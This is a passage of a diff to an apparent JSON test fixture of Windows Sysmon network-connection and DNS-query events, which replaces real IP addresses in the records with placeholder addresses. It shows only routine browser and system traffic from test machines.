AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea00:20f:0:0:18a2:6e00:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ea00:203:3000:3000:3000:3000:3000:3300\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e8\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:47.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event" }, @@ -3034,7 +3034,7 @@ "@timestamp": "2021-05-05T15:30:51.700Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e10\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.148\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1138\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e10\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.148\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1138\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event" }, @@ -3062,7 +3062,7 @@ "ProcessId": "1600", "Image": "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "Initiated": "true", - "DestinationIp": "40.77.226.250", + "DestinationIp": "89.160.20.156", "SourceHostname": "vagrant-2012-r2.local.crowbird.com" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -3087,7 +3087,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.214\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1139\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.214\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1139\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event" }, @@ -3123,7 +3123,7 @@ "Image": "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "SourceIsIpv6": "false", "SourcePort": "1139", - "DestinationIp": "40.77.226.250", + "DestinationIp": "89.160.20.156", "DestinationPort": "443", "UtcTime": "2019-03-18 16:57:48.214", "ProcessGuid": "{42f11c3b-ccaa-5c8f-0000-0010b4e22700}" @@ -3149,7 +3149,7 @@ "event_data": { "QueryName": "ocsp.int-x3.letsencrypt.org", "QueryStatus": "0", - "QueryResults": "type: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.177;", + "QueryResults": "type: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.468", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -3166,7 +3166,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802753800Z'/\u003e\u003cEventRecordID\u003e124\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.468\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.int-x3.letsencrypt.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.177;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802753800Z'/\u003e\u003cEventRecordID\u003e124\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.468\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.int-x3.letsencrypt.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3179,7 +3179,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802768300Z'/\u003e\u003cEventRecordID\u003e125\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.581\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.pki.goog\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pki-goog.l.google.com;::ffff:172.217.12.195;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802768300Z'/\u003e\u003cEventRecordID\u003e125\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.581\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.pki.goog\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pki-goog.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -3202,7 +3202,7 @@ "ProcessId": "2736", "QueryName": "ocsp.pki.goog", "QueryStatus": "0", - "QueryResults": "type: 5 pki-goog.l.google.com;::ffff:172.217.12.195;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 pki-goog.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.581" }, @@ -3280,7 +3280,7 @@ "ProcessId": "2736", "QueryName": "googleads4.g.doubleclick.net", "QueryStatus": "0", - "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;", + "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.872", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -3301,7 +3301,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029828800Z'/\u003e\u003cEventRecordID\u003e126\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.872\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads4.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029828800Z'/\u003e\u003cEventRecordID\u003e126\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.872\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads4.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3382,7 +3382,7 @@ "ProcessId": "2736", "QueryName": "images.taboola.com", "QueryStatus": "0", - "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:151.101.2.2;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;", + "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -3401,7 +3401,7 @@ "version": 5 }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029851300Z'/\u003e\u003cEventRecordID\u003e127\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.889\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimages.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.2.2;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 